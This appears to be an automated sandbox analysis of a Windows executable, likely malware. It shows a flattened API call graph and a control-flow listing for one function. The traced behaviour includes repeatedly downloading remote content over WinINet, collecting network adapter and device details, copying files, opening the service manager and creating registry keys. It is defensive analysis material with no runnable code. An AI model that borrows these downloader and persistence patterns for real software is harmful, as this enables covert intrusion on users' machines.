__calloc_crt 59 API calls 61363->61365 61368 2e533e8 61365->61368 61366 2e533cc 61386 2e54ef5 9 API calls __fclose_nolock 61366->61386 61369 2e53439 61368->61369 61380 2e55c5a 61368->61380 61371 2e52f74 _free 59 API calls 61369->61371 61373 2e5343f 61371->61373 61375 2e5210b 61373->61375 61387 2e55e3a 59 API calls 2 library calls 61373->61387 61374 2e55ce1 __initptd 59 API calls 61376 2e533fe CreateThread 61374->61376 61375->61355 61375->61357 61375->61358 61376->61375 61379 2e53431 GetLastError 61376->61379 61404 2e53519 61376->61404 61379->61369 61388 2e55c72 GetLastError 61380->61388 61382 2e55c60 61383 2e533f5 61382->61383 61402 2e58440 59 API calls 3 library calls 61382->61402 61383->61374 61385->61366 61386->61375 61387->61375 61389 2e591cb __getptd_noexit TlsGetValue 61388->61389 61390 2e55c87 61389->61390 61391 2e55cd5 SetLastError 61390->61391 61392 2e58a6d __calloc_crt 56 API calls 61390->61392 61391->61382 61393 2e55c9a 61392->61393 61393->61391 61403 2e591ea TlsSetValue 61393->61403 61395 2e55cae 61396 2e55cb4 61395->61396 61397 2e55ccc 61395->61397 61398 2e55ce1 __initptd 56 API calls 61396->61398 61399 2e52f74 _free 56 API calls 61397->61399 61400 2e55cbc GetCurrentThreadId 61398->61400 61401 2e55cd2 61399->61401 61400->61391 61401->61391 61403->61395 61405 2e53522 __threadstartex@4 61404->61405 61406 2e591cb __getptd_noexit TlsGetValue 61405->61406 61407 2e53528 61406->61407 61408 2e5352f __threadstartex@4 61407->61408 61409 2e5355b 61407->61409 61436 2e591ea TlsSetValue 61408->61436 61437 2e55aef 59 API calls 6 library calls 61409->61437 61411 2e53576 ___crtIsPackagedApp 61414 2e5358a 61411->61414 61420 2e534c1 61411->61420 61413 2e5353e 61415 2e53544 GetLastError RtlExitUserThread 61413->61415 61416 2e53551 GetCurrentThreadId 61413->61416 61426 2e53452 61414->61426 61415->61416 61416->61411 61421 2e53503 RtlDecodePointer 61420->61421 61422 2e534ca LoadLibraryExW GetProcAddress 61420->61422 61425 2e53513 61421->61425 61423 2e534ed RtlEncodePointer 61422->61423 61424 2e534ec 61422->61424 61423->61421 61424->61414 61425->61414 61427 2e5345e __fcloseall 61426->61427 61428 2e55c5a _LocaleUpdate::_LocaleUpdate 59 API calls 61427->61428 61429 2e53463 61428->61429 61438 2e52160 61429->61438 61432 2e53473 61433 2e58d94 __XcptFilter 59 API calls 61432->61433 61434 2e53484 61433->61434 61436->61413 61437->61411 61456 2e51610 61438->61456 61441 2e521b0 61478 2e4ddb3 61441->61478 61442 2e521a8 TlsSetValue 61442->61441 61447 2e53493 61448 2e55c72 __getptd_noexit 59 API calls 61447->61448 61449 2e5349c 61448->61449 61450 2e534b7 RtlExitUserThread 61449->61450 61451 2e534b0 61449->61451 61452 2e534ab 61449->61452 61594 2e55c24 59 API calls 2 library calls 61451->61594 61593 2e53596 LoadLibraryExW GetProcAddress RtlEncodePointer RtlDecodePointer 61452->61593 61455 2e534b6 61455->61450 61474 2e51674 61456->61474 61457 2e516f0 61458 2e51706 61457->61458 61459 2e51703 CloseHandle 61457->61459 61494 2e5454b 61458->61494 61459->61458 61460 2e516ce ResetEvent 61466 2e516d5 61460->61466 61462 2e5179c WaitForSingleObject 61462->61474 61463 2e516a5 OpenEventA 61468 2e516c7 61463->61468 61469 2e516bf 61463->61469 61464 2e5168c 61464->61460 61464->61463 61501 2e51c10 GetCurrentProcessId 61464->61501 61465 2e5171e 61465->61441 61465->61442 61502 2e51850 CreateEventA CloseHandle SetEvent GetCurrentProcessId 61466->61502 61468->61460 61468->61466 61469->61468 61471 2e516c4 CloseHandle 61469->61471 61470 2e516a2 61470->61463 61471->61468 61472 2e51770 CreateEventA 61472->61474 61474->61457 61474->61462 61474->61464 61474->61472 61476 2e5178e CloseHandle 61474->61476 61503 2e51c10 GetCurrentProcessId 61474->61503 61476->61474 61477 2e516ed 61477->61457 61479 2e4ddd5 61478->61479 61505 2e44d86 61479->61505 61480 2e4ddd8 61482 2e51f30 61480->61482 61483 2e51f69 TlsGetValue 61482->61483 61492 2e51f61 Mailbox 61482->61492 61483->61492 61484 2e51fdd 61485 2e52006 61484->61485 61489 2e51ffe GetProcessHeap HeapFree 61484->61489 61485->61447 61486 2e51fb9 61487 2e51610 17 API calls 61486->61487 61490 2e51fc8 61487->61490 61488 2e52049 GetProcessHeap HeapFree 61488->61492 61489->61485 61490->61484 61491 2e51fd5 TlsSetValue 61490->61491 61491->61484 61492->61484 61492->61486 61492->61488 61493 2e5203b GetProcessHeap HeapFree 61492->61493 61493->61488 61495 2e54555 IsProcessorFeaturePresent 61494->61495 61496 2e54553 61494->61496 61498 2e5958f 61495->61498 61496->61465 61504 2e5953e 5 API calls 2 library calls 61498->61504 61500 2e59672 61500->61465 61501->61470 61502->61477 61503->61474 61504->61500 61506 2e44d90 __EH_prolog 61505->61506 61507 2e50b10 Mailbox 68 API calls 61506->61507 61508 2e44da6 RtlEnterCriticalSection RtlLeaveCriticalSection 61507->61508 61509 2e450d4 shared_ptr 61508->61509 61522 2e44dd1 std::bad_exception::bad_exception 61508->61522 61509->61480 61511 2e450a1 RtlEnterCriticalSection RtlLeaveCriticalSection 61512 2e450b3 RtlEnterCriticalSection RtlLeaveCriticalSection 61511->61512 61512->61509 61512->61522 61513 2e4a724 73 API calls 61513->61522 61515 2e44e8d RtlEnterCriticalSection RtlLeaveCriticalSection 61516 2e44e9f RtlEnterCriticalSection RtlLeaveCriticalSection 61515->61516 61516->61522 61517 2e4ced8 73 API calls 61517->61522 61522->61511 61522->61512 61522->61513 61522->61515 61522->61516 61522->61517 61525 2e44bed 61522->61525 61549 2e47d23 60 API calls 61522->61549 61550 2e4d00a 60 API calls 2 library calls 61522->61550 61551 2e47cfd 60 API calls std::bad_exception::bad_exception 61522->61551 61552 2e4a9b1 60 API calls 2 library calls 61522->61552 61553 2e4aa89 210 API calls 3 library calls 61522->61553 61554 2e518f0 GetProcessHeap HeapFree 61522->61554 61555 2e44100 GetProcessHeap HeapFree 61522->61555 61526 2e44bf7 __EH_prolog 61525->61526 61527 2e41ba7 209 API calls 61526->61527 61528 2e44c31 61527->61528 61556 2e43a94 61528->61556 61530 2e44c3c 61531 2e43a94 60 API calls 61530->61531 61532 2e44c56 61531->61532 61559 2e485d1 61532->61559 61537 2e50b10 Mailbox 68 API calls 61538 2e44cb8 61537->61538 61584 2e4c28f 61538->61584 61540 2e44ce1 InterlockedExchange 61588 2e42995 95 API calls Mailbox 61540->61588 61544 2e44d06 61548 2e44d3c 61544->61548 61589 2e4858d 76 API calls Mailbox 61544->61589 61590 2e482f7 82 API calls Mailbox 61544->61590 61591 2e42995 95 API calls Mailbox 61544->61591 61545 2e44d57 shared_ptr 61545->61522 61592 2e4861a 75 API calls 2 library calls 61548->61592 61549->61522 61550->61522 61551->61522 61552->61522 61553->61522 61554->61522 61555->61522 61557 2e439ee 60 API calls 61556->61557 61558 2e43ab5 61557->61558 61558->61530 61560 2e50b10 Mailbox 68 API calls 61559->61560 61561 2e485e7 61560->61561 61562 2e49a20 77 API calls 61561->61562 61563 2e48601 61562->61563 61564 2e41712 60 API calls 61563->61564 61565 2e44c8b 61564->61565 61566 2e4e0f7 61565->61566 61567 2e4e101 __EH_prolog 61566->61567 61568 2e41a01 61 API calls 61567->61568 61569 2e4e118 61568->61569 61570 2e4e155 InterlockedExchangeAdd 61569->61570 61572 2e50b10 Mailbox 68 API calls 61569->61572 61573 2e4e185 61570->61573 61574 2e4e190 RtlEnterCriticalSection 61570->61574 61572->61570 61575 2e41ec7 InterlockedIncrement PostQueuedCompletionStatus RtlEnterCriticalSection InterlockedExchange RtlLeaveCriticalSection 61573->61575 61576 2e47f5a 60 API calls 61574->61576 61577 2e4e18e 61575->61577 61578 2e4e1b6 InterlockedIncrement 61576->61578 61582 2e4e851 TlsGetValue 61577->61582 61579 2e4e1c6 61578->61579 61580 2e4e1cd RtlLeaveCriticalSection 61578->61580 61581 2e427f3 SetWaitableTimer 61579->61581 61580->61577 61581->61580 61583 2e44ca4 61582->61583 61583->61537 61585 2e4c2a2 61584->61585 61586 2e4c2cb 61585->61586 61587 2e4e9c0 83 API calls 61585->61587 61586->61540 61587->61586 61588->61544 61589->61544 61590->61544 61591->61544 61592->61545 61593->61451 61594->61455 61595->61250 61596->61253 61597->61253 61598->61257 61600 2e4e339 __EH_prolog 61599->61600 61601 2e53b4c _Allocate 60 API calls 61600->61601 61602 2e4e342 61601->61602 61603 2e41bfa RtlEnterCriticalSection 61602->61603 61605 2e4e550 61602->61605 61603->61262 61606 2e4e55a __EH_prolog 61605->61606 61609 2e426db RtlEnterCriticalSection 61606->61609 61608 2e4e5b0 61608->61603 61610 2e4277e 61609->61610 61611 2e42728 CreateWaitableTimerA 61609->61611 61614 2e427d5 RtlLeaveCriticalSection 61610->61614 61616 2e53b4c _Allocate 60 API calls 61610->61616 61612 2e42738 GetLastError 61611->61612 61613 2e4275b SetWaitableTimer 61611->61613 61615 2e50b10 Mailbox 68 API calls 61612->61615 61613->61610 61614->61608 61617 2e42745 61615->61617 61618 2e4278a 61616->61618 61653 2e41712 61617->61653 61620 2e427c8 61618->61620 61621 2e53b4c _Allocate 60 API calls 61618->61621 61659 2e47e02 CloseHandle 61620->61659 61623 2e427a9 61621->61623 61625 2e41cf8 CreateEventA 61623->61625 61626 2e41d52 CreateEventA 61625->61626 61627 2e41d23 GetLastError 61625->61627 61628 2e41d6b GetLastError 61626->61628 61645 2e41d96 61626->61645 61630 2e41d33 61627->61630 61631 2e41d7b 61628->61631 61629 2e533b9 __beginthreadex 201 API calls 61632 2e41db6 61629->61632 61633 2e50b10 Mailbox 68 API calls 61630->61633 61634 2e50b10 Mailbox 68 API calls 61631->61634 61635 2e41dc6 GetLastError 61632->61635 61636 2e41e0d 61632->61636 61637 2e41d3c 61633->61637 61638 2e41d84 61634->61638 61643 2e41dd8 61635->61643 61639 2e41e11 WaitForSingleObject CloseHandle 61636->61639 61640 2e41e1d 61636->61640 61641 2e41712 60 API calls 61637->61641 61642 2e41712 60 API calls 61638->61642 61639->61640 61640->61620 61644 2e41d4e 61641->61644 61642->61645 61646 2e41ddc CloseHandle 61643->61646 61647 2e41ddf 61643->61647 61644->61626 61645->61629 61646->61647 61648 2e41dee 61647->61648 61649 2e41de9 CloseHandle 61647->61649 61650 2e50b10 Mailbox 68 API calls 61648->61650 61649->61648 61651 2e41dfb 61650->61651 61652 2e41712 60 API calls 61651->61652 61652->61636 61654 2e4171c __EH_prolog 61653->61654 61655 2e4173e 61654->61655 61660 2e41815 59 API calls std::exception::exception 61654->61660 61655->61613 61657 2e41732 61661 2e4a4a1 60 API calls 2 library calls 61657->61661 61659->61614 61660->61657 61673 2e430ae WSASetLastError 61662->61673 61665 2e430ae 71 API calls 61666 2e43c90 61665->61666 61667 2e416ae 61666->61667 61668 2e416b8 __EH_prolog 61667->61668 61669 2e41701 61668->61669 61689 2e524d3 59 API calls std::exception::_Copy_str 61668->61689 61669->61271 61671 2e416dc 61690 2e4a4a1 60 API calls 2 library calls 61671->61690 61674 2e430ec WSAStringToAddressA 61673->61674 61675 2e430ce 61673->61675 61676 2e4a508 69 API calls 61674->61676 61675->61674 61677 2e430d3 61675->61677 61678 2e43114 61676->61678 61679 2e50b10 Mailbox 68 API calls 61677->61679 61680 2e4311e _memcmp 61678->61680 61682 2e43154 61678->61682 61687 2e430d8 61679->61687 61681 2e43135 61680->61681 61685 2e50b10 Mailbox 68 API calls 61680->61685 61684 2e50b10 Mailbox 68 API calls 61681->61684 61686 2e43193 61681->61686 61682->61681 61683 2e50b10 Mailbox 68 API calls 61682->61683 61683->61681 61684->61686 61685->61681 61686->61687 61688 2e50b10 Mailbox 68 API calls 61686->61688 61687->61665 61687->61666 61688->61687 61689->61671 61691->61276 61692->61277 61714 2e4353e 61693->61714 61697 2e42ae8 WSASetLastError connect 61696->61697 61698 2e42ad8 61696->61698 61700 2e4a508 69 API calls 61697->61700 61699 2e50b10 Mailbox 68 API calls 61698->61699 61701 2e42add 61699->61701 61702 2e42b07 61700->61702 61704 2e50b10 Mailbox 68 API calls 61701->61704 61702->61701 61703 2e50b10 Mailbox 68 API calls 61702->61703 61703->61701 61705 2e42b1b 61704->61705 61706 2e50b10 Mailbox 68 API calls 61705->61706 61708 2e42b38 61705->61708 61706->61708 61710 2e42b87 61708->61710 61765 2e43027 71 API calls Mailbox 61708->61765 61709 2e42b59 61709->61710 61766 2e42fb4 71 API calls Mailbox 61709->61766 61710->61283 61712 2e42b7a 61712->61710 61713 2e50b10 Mailbox 68 API calls 61712->61713 61713->61710 61715 2e43548 __EH_prolog 61714->61715 61716 2e43576 61715->61716 61717 2e43557 61715->61717 61736 2e42edd WSASetLastError WSASocketA 61716->61736 61744 2e41996 68 API calls __cinit 61717->61744 61721 2e435ad CreateIoCompletionPort 61722 2e435c5 GetLastError 61721->61722 61723 2e435db 61721->61723 61724 2e50b10 Mailbox 68 API calls 61722->61724 61725 2e50b10 Mailbox 68 API calls 61723->61725 61726 2e435d2 61724->61726 61725->61726 61727 2e43626 61726->61727 61728 2e435ef 61726->61728 61763 2e4def2 60 API calls 2 library calls 61727->61763 61729 2e50b10 Mailbox 68 API calls 61728->61729 61730 2e43608 61729->61730 61745 2e429ee 61730->61745 61733 2e4355f 61733->61280 61734 2e43659 61735 2e50b10 Mailbox 68 API calls 61734->61735 61735->61733 61737 2e50b10 Mailbox 68 API calls 61736->61737 61738 2e42f0a WSAGetLastError 61737->61738 61739 2e42f21 61738->61739 61740 2e42f41 61738->61740 61741 2e42f27 setsockopt 61739->61741 61742 2e42f3c 61739->61742 61740->61721 61740->61733 61741->61742 61743 2e50b10 Mailbox 68 API calls 61742->61743 61743->61740 61744->61733 61748 2e42a0c 61745->61748 61762 2e42aad 61745->61762 61746 2e42a39 WSASetLastError closesocket 61749 2e4a508 69 API calls 61746->61749 61747 2e50b10 Mailbox 68 API calls 61750 2e42ab8 61747->61750 61748->61746 61751 2e50b10 Mailbox 68 API calls 61748->61751 61752 2e42a51 61749->61752 61750->61733 61753 2e42a21 61751->61753 61755 2e50b10 Mailbox 68 API calls 61752->61755 61752->61762 61764 2e42f50 71 API calls Mailbox 61753->61764 61757 2e42a5c 61755->61757 61756 2e42a36 61756->61746 61758 2e42a7b ioctlsocket WSASetLastError closesocket 61757->61758 61759 2e50b10 Mailbox 68 API calls 61757->61759 61761 2e4a508 69 API calls 61758->61761 61760 2e42a6e 61759->61760 61760->61758 61760->61762 61761->61762 61762->61747 61762->61750 61763->61734 61764->61756 61765->61709 61766->61712 61768 2e42de4 61767->61768 61769 2e42dca 61767->61769 61770 2e42dfc 61768->61770 61772 2e42def 61768->61772 61771 2e50b10 Mailbox 68 API calls 61769->61771 61781 2e42d39 WSASetLastError WSASend 61770->61781 61775 2e42dcf 61771->61775 61774 2e50b10 Mailbox 68 API calls 61772->61774 61774->61775 61775->61286 61776 2e42e54 WSASetLastError select 61777 2e4a508 69 API calls 61776->61777 61779 2e42e0c 61777->61779 61778 2e50b10 68 API calls Mailbox 61778->61779 61779->61775 61779->61776 61779->61778 61780 2e42d39 71 API calls 61779->61780 61780->61779 61782 2e4a508 69 API calls 61781->61782 61783 2e42d6e 61782->61783 61784 2e42d75 61783->61784 61785 2e42d82 61783->61785 61787 2e50b10 Mailbox 68 API calls 61784->61787 61786 2e42d7a 61785->61786 61788 2e50b10 Mailbox 68 API calls 61785->61788 61789 2e42d9c 61786->61789 61790 2e50b10 Mailbox 68 API calls 61786->61790 61787->61786 61788->61786 61789->61779 61790->61789 61791->61304 61792 2e4648b RtlInitializeCriticalSection GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress 61831 2e442c7 61792->61831 61794 2e464f3 GetTickCount 61833 2e4605a 61794->61833 61796 2e46508 GetVersionExA 61797 2e46549 __cftoa_l 61796->61797 61798 2e52fac _malloc 59 API calls 61797->61798 61799 2e46556 61798->61799 61800 2e52fac _malloc 59 API calls 61799->61800 61801 2e46566 61800->61801 61802 2e52fac _malloc 59 API calls 61801->61802 61803 2e46571 61802->61803 61804 2e52fac _malloc 59 API calls 61803->61804 61805 2e4657c 61804->61805 61806 2e52fac _malloc 59 API calls 61805->61806 61807 2e46587 61806->61807 61808 2e52fac _malloc 59 API calls 61807->61808 61809 2e46592 61808->61809 61810 2e52fac _malloc 59 API calls 61809->61810 61811 2e4659d 61810->61811 61812 2e52fac _malloc 59 API calls 61811->61812 61813 2e465ac 6 API calls 61812->61813 61814 2e465ff __cftoa_l 61813->61814 61815 2e46618 RtlEnterCriticalSection RtlLeaveCriticalSection 61814->61815 61816 2e52fac _malloc 59 API calls 61815->61816 61817 2e46657 61816->61817 61818 2e52fac _malloc 59 API calls 61817->61818 61819 2e46665 61818->61819 61820 2e52fac _malloc 59 API calls 61819->61820 61821 2e4666c 61820->61821 61822 2e52fac _malloc 59 API calls 61821->61822 61823 2e46692 QueryPerformanceCounter Sleep 61822->61823 61824 2e52fac _malloc 59 API calls 61823->61824 61825 2e466bf 61824->61825 61826 2e52fac _malloc 59 API calls 61825->61826 61827 2e466cc __cftoa_l 61826->61827 61828 2e46708 Sleep 61827->61828 61829 2e4670e RtlEnterCriticalSection RtlLeaveCriticalSection 61827->61829 61828->61829 61830 2e46744 __cftoa_l 61829->61830 61832 2e4429f _memmove 61831->61832 61832->61794 61834 2e52fac _malloc 59 API calls 61833->61834 61835 2e4606d 61834->61835 61836 403310 GetVersion 61860 404454 HeapCreate 61836->61860 61838 40336f 61839 403374 61838->61839 61840 40337c 61838->61840 61935 40342b 8 API calls 61839->61935 61872 404134 61840->61872 61844 403384 GetCommandLineA 61886 404002 61844->61886 61848 40339e 61918 403cfc 61848->61918 61850 4033a3 61851 4033a8 GetStartupInfoA 61850->61851 61931 403ca4 61851->61931 61853 4033ba GetModuleHandleA 61855 4033de 61853->61855 61936 403a4b GetCurrentProcess TerminateProcess ExitProcess 61855->61936 61857 4033e7 61937 403b20 UnhandledExceptionFilter 61857->61937 61859 4033f8 61861 404474 61860->61861 61862 4044aa 61860->61862 61938 40430c 19 API calls 61861->61938 61862->61838 61864 404479 61865 404490 61864->61865 61866 404483 61864->61866 61868 4044ad 61865->61868 61940 40507c HeapAlloc VirtualAlloc VirtualAlloc VirtualFree HeapFree 61865->61940 61939 40482b HeapAlloc 61866->61939 61868->61838 61869 40448d 61869->61868 61871 40449e HeapDestroy 61869->61871 61871->61862 61941 40344f 61872->61941 61876 404153 GetStartupInfoA 61882 404264 61876->61882 61885 40419f 61876->61885 61878 40428b GetStdHandle 61881 404299 GetFileType 61878->61881 61878->61882 61879 4042cb SetHandleCount 61879->61844 61880 40344f 12 API calls 61880->61885 61881->61882 61882->61878 61882->61879 61883 404210 61883->61882 61884 404232 GetFileType 61883->61884 61884->61883 61885->61880 61885->61882 61885->61883 61887 404050 61886->61887 61888 40401d GetEnvironmentStringsW 61886->61888 61889 404025 61887->61889 61890 404041 61887->61890 61888->61889 61891 404031 GetEnvironmentStrings 61888->61891 61893 404069 WideCharToMultiByte 61889->61893 61894 40405d GetEnvironmentStringsW 61889->61894 61892 403394 61890->61892 61895 4040e3 GetEnvironmentStrings 61890->61895 61896 4040ef 61890->61896 61891->61890 61891->61892 61909 403db5 61892->61909 61898 40409d 61893->61898 61899 4040cf FreeEnvironmentStringsW 61893->61899 61894->61892 61894->61893 61895->61892 61895->61896 61900 40344f 12 API calls 61896->61900 61901 40344f 12 API calls 61898->61901 61899->61892 61907 40410a 61900->61907 61902 4040a3 61901->61902 61902->61899 61903 4040ac WideCharToMultiByte 61902->61903 61905 4040c6 61903->61905 61906 4040bd 61903->61906 61904 404120 FreeEnvironmentStringsA 61904->61892 61905->61899 61950 403501 61906->61950 61907->61904 61910 403dc7 61909->61910 61911 403dcc GetModuleFileNameA 61909->61911 61963 406614 19 API calls 61910->61963 61913 403def 61911->61913 61914 40344f 12 API calls 61913->61914 61915 403e10 61914->61915 61916 403e20 61915->61916 61964 403406 7 API calls 61915->61964 61916->61848 61919 403d09 61918->61919 61921 403d0e 61918->61921 61965 406614 19 API calls 61919->61965 61922 40344f 12 API calls 61921->61922 61923 403d3b 61922->61923 61929 403d4f 61923->61929 61966 403406 7 API calls 61923->61966 61925 403d92 61926 403501 7 API calls 61925->61926 61927 403d9e 61926->61927 61927->61850 61928 40344f 12 API calls 61928->61929 61929->61925 61929->61928 61967 403406 7 API calls 61929->61967 61932 403cad 61931->61932 61934 403cb2 61931->61934 61968 406614 19 API calls 61932->61968 61934->61853 61936->61857 61937->61859 61938->61864 61939->61869 61940->61869 61945 403461 61941->61945 61944 403406 7 API calls 61944->61876 61946 40345e 61945->61946 61948 403468 61945->61948 61946->61876 61946->61944 61948->61946 61949 40348d 12 API calls 61948->61949 61949->61948 61951 403529 61950->61951 61952 40350d 61950->61952 61951->61905 61953 403517 61952->61953 61954 40352d 61952->61954 61956 403559 HeapFree 61953->61956 61957 403523 61953->61957 61955 403558 61954->61955 61958 403547 61954->61958 61955->61956 61956->61951 61961 40489e VirtualFree VirtualFree HeapFree 61957->61961 61962 40532f VirtualFree HeapFree VirtualFree 61958->61962 61961->61951 61962->61951 61963->61911 61964->61916 61965->61921 61966->61929 61967->61929 61968->61934 61969 402332 61970 40d298 GetLocalTime 61969->61970 61971 40d998 61970->61971 61973 401f27 61971->61973 61974 401f3c 61973->61974 61977 401a1d 61974->61977 61976 401f45 61976->61971 61978 401a2c 61977->61978 61983 401a4f CreateFileA 61978->61983 61982 401a3e 61982->61976 61984 401a35 61983->61984 61989 401a7d 61983->61989 61991 401b4b LoadLibraryA 61984->61991 61985 401a98 DeviceIoControl 61985->61989 61986 401b3a CloseHandle 61986->61984 61988 401b0e GetLastError 61988->61986 61988->61989 61989->61985 61989->61986 61989->61988 62000 403106 7 API calls 61989->62000 62001 4030f8 12 API calls 61989->62001 61992 401c21 61991->61992 61993 401b6e GetProcAddress 61991->61993 61992->61982 61994 401c18 FreeLibrary 61993->61994 61997 401b85 61993->61997 61994->61992 61995 401b95 GetAdaptersInfo 61995->61997 61997->61995 61998 401c15 61997->61998 62002 403106 7 API calls 61997->62002 62003 4030f8 12 API calls 61997->62003 61998->61994 62000->61989 62001->61989 62002->61997 62003->61997 62004 40d0f2 CopyFileA 62005 40d0f8 OpenSCManagerA 62004->62005 62007 40d927 62005->62007 62008 2ea10ff 62009 2ed307c DeleteFileA 62008->62009 62010 2ed8072 62009->62010 62011 402556 RegCreateKeyExA 62012 40db60 62011->62012 62013 402a64 SetEvent 62011->62013 62012->62013 62014 40db66 62012->62014 62015 402b11 62013->62015 62015->62015 62016 40d3b7 62017 40d3b8 62016->62017 62018 40db05 62017->62018 62020 401f64 FindResourceA 62017->62020 62021 401f86 GetLastError SizeofResource 62020->62021 62027 401f9f 62020->62027 62022 401fa6 LoadResource LockResource GlobalAlloc 62021->62022 62021->62027 62023 401fd2 62022->62023 62024 401ffb GetTickCount 62023->62024 62026 402005 GlobalAlloc 62024->62026 62026->62027 62027->62018 62028 4026b8 62029 40db3d CreateDirectoryA 62028->62029 62030 40dacc 62029->62030 62030->62029 62031 40233a 62032 40d755 Sleep 62031->62032

                                                                  Executed Functions

                                                                  Function 02E472AB Relevance: 74.2, APIs: 29, Strings: 13, Instructions: 659networksleepfileCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 0 2e472ab-2e472c3 InternetOpenA 1 2e47389-2e4738f 0->1 2 2e472c9-2e47340 InternetSetOptionA * 3 call 2e54af0 InternetOpenUrlA 0->2 4 2e47391-2e47397 1->4 5 2e473ab-2e473b9 1->5 13 2e47382-2e47383 InternetCloseHandle 2->13 14 2e47342 2->14 6 2e4739d-2e473aa call 2e453ec 4->6 7 2e47399-2e4739b 4->7 8 2e466f4-2e466f6 5->8 9 2e473bf-2e473e3 call 2e54af0 call 2e4439c 5->9 6->5 7->5 15 2e466ff-2e46701 8->15 16 2e466f8-2e466fd 8->16 9->8 33 2e473e9-2e47417 RtlEnterCriticalSection RtlLeaveCriticalSection call 2e5233c 9->33 13->1 22 2e47346-2e4736c InternetReadFile 14->22 18 2e46703 15->18 19 2e4670e-2e46742 RtlEnterCriticalSection RtlLeaveCriticalSection 15->19 17 2e46708 Sleep 16->17 17->19 18->17 23 2e46744-2e46750 19->23 24 2e46792 19->24 26 2e47377-2e4737e InternetCloseHandle 22->26 27 2e4736e-2e47375 22->27 23->24 28 2e46752-2e4675f 23->28 30 2e46796 24->30 26->13 27->22 31 2e46767-2e46768 28->31 32 2e46761-2e46765 28->32 34 2e4676c-2e46790 call 2e54af0 * 2 31->34 32->34 39 2e4746d-2e47488 call 2e5233c 33->39 40 2e47419-2e4742b call 2e5233c 33->40 34->30 48 2e47742-2e47754 call 2e5233c 39->48 49 2e4748e-2e47490 39->49 40->39 47 2e4742d-2e4743f call 2e5233c 40->47 47->39 56 2e47441-2e47453 call 2e5233c 47->56 57 2e47756-2e47758 48->57 58 2e4779d-2e477af call 2e5233c 48->58 49->48 52 2e47496-2e47548 call 2e52fac RtlEnterCriticalSection RtlLeaveCriticalSection call 2e54af0 * 5 call 2e4439c * 2 49->52 115 2e47585 52->115 116 2e4754a-2e4754c 52->116 56->39 70 2e47455-2e47467 call 2e5233c 56->70 57->58 60 2e4775a-2e47798 call 2e54af0 RtlEnterCriticalSection RtlLeaveCriticalSection 57->60 71 2e477d0-2e477e2 call 2e5233c 58->71 72 2e477b1-2e477bf call 2e461f5 call 2e46303 58->72 60->8 70->8 70->39 81 2e47b00-2e47b12 call 2e5233c 71->81 82 2e477e8-2e477ea 71->82 87 2e477c4-2e477cb call 2e4640e 72->87 81->8 96 2e47b18-2e47b46 call 2e52fac call 2e54af0 call 2e4439c 81->96 82->81 85 2e477f0-2e47807 call 2e4439c 82->85 85->8 97 2e4780d-2e478db call 2e52418 call 2e41ba7 85->97 87->8 117 2e47b4f-2e47b56 call 2e52f74 96->117 118 2e47b48-2e47b4a call 2e4534d 96->118 113 2e478e2-2e47903 RtlEnterCriticalSection 97->113 114 2e478dd call 2e4143f 97->114 121 2e47905-2e4790c 113->121 122 2e4790f-2e47973 RtlLeaveCriticalSection call 2e43c67 call 2e43d7e call 2e4833a 113->122 114->113 119 2e47589-2e475b7 call 2e52fac call 2e54af0 call 2e4439c 115->119 116->115 123 2e4754e-2e47560 call 2e5233c 116->123 117->8 118->117 146 2e475f8-2e47601 call 2e52f74 119->146 147 2e475b9-2e475c8 call 2e535e6 119->147 121->122 144 2e47ae7-2e47afb call 2e49002 122->144 145 2e47979-2e479c1 call 2e4a724 122->145 123->115 134 2e47562-2e47583 call 2e4439c 123->134 134->119 144->8 157 2e479c7-2e479ce 145->157 158 2e47ab1-2e47ae2 call 2e483e9 call 2e433b2 145->158 159 2e47607-2e4761f call 2e53b4c 146->159 160 2e47738-2e4773b 146->160 147->146 156 2e475ca 147->156 161 2e475cf-2e475e1 call 2e52850 156->161 163 2e479d1-2e479d6 157->163 158->144 172 2e47621-2e47629 call 2e49736 159->172 173 2e4762b 159->173 160->48 175 2e475e6-2e475f6 call 2e535e6 161->175 176 2e475e3 161->176 163->163 167 2e479d8-2e47a23 call 2e4a724 163->167 167->158 182 2e47a29-2e47a2f 167->182 174 2e4762d-2e476cf call 2e4a84e call 2e43863 call 2e45119 call 2e43863 call 2e4aaf4 call 2e4ac0e 172->174 173->174 201 2e476d4-2e476e5 174->201 175->146 175->161 176->175 185 2e47a32-2e47a37 182->185 185->185 187 2e47a39-2e47a74 call 2e4a724 185->187 187->158 192 2e47a76-2e47aaa call 2e4d116 187->192 196 2e47aaf-2e47ab0 192->196 196->158 202 2e476e7 call 2e4380b 201->202 203 2e476ec-2e47717 Sleep call 2e518f0 201->203 202->203 207 2e47723-2e47731 203->207 208 2e47719-2e47722 call 2e44100 203->208 207->160 210 2e47733 call 2e4380b 207->210 208->207 210->160
                                                                  APIs
                                                                  • Sleep.KERNEL32(0000EA60), ref: 02E46708
                                                                  • RtlEnterCriticalSection.NTDLL(02E771E0), ref: 02E46713
                                                                  • RtlLeaveCriticalSection.NTDLL(02E771E0), ref: 02E46724
                                                                  • InternetOpenA.WININET(?), ref: 02E472B5
                                                                  • InternetSetOptionA.WININET(00000000,00000002,?), ref: 02E472DD
                                                                  • InternetSetOptionA.WININET(00000000,00000005,00001388,00000004), ref: 02E472F5
                                                                  • InternetSetOptionA.WININET(00000000,00000006,00001388,00000004), ref: 02E4730D
                                                                  • InternetOpenUrlA.WININET(00000000,?,?,000000FF,04000200), ref: 02E47336
                                                                  • InternetReadFile.WININET(00000000,?,00001000,?), ref: 02E47358
                                                                  • InternetCloseHandle.WININET(00000000), ref: 02E47378
                                                                  • InternetCloseHandle.WININET(00000000), ref: 02E47383
                                                                  • RtlEnterCriticalSection.NTDLL(02E771E0), ref: 02E473EE
                                                                  • RtlLeaveCriticalSection.NTDLL(02E771E0), ref: 02E473FF
                                                                  • _malloc.LIBCMT ref: 02E47498
                                                                  • RtlEnterCriticalSection.NTDLL(02E771E0), ref: 02E474AA
                                                                  • RtlLeaveCriticalSection.NTDLL(02E771E0), ref: 02E474B6
                                                                  • _malloc.LIBCMT ref: 02E4758E
                                                                  • _strtok.LIBCMT ref: 02E475BF
                                                                  • _swscanf.LIBCMT ref: 02E475D6
                                                                  • _strtok.LIBCMT ref: 02E475ED
                                                                  • _free.LIBCMT ref: 02E475F9
                                                                  • Sleep.KERNEL32(000007D0), ref: 02E476F1
                                                                  • RtlEnterCriticalSection.NTDLL(02E771E0), ref: 02E47772
                                                                  • RtlLeaveCriticalSection.NTDLL(02E771E0), ref: 02E47784
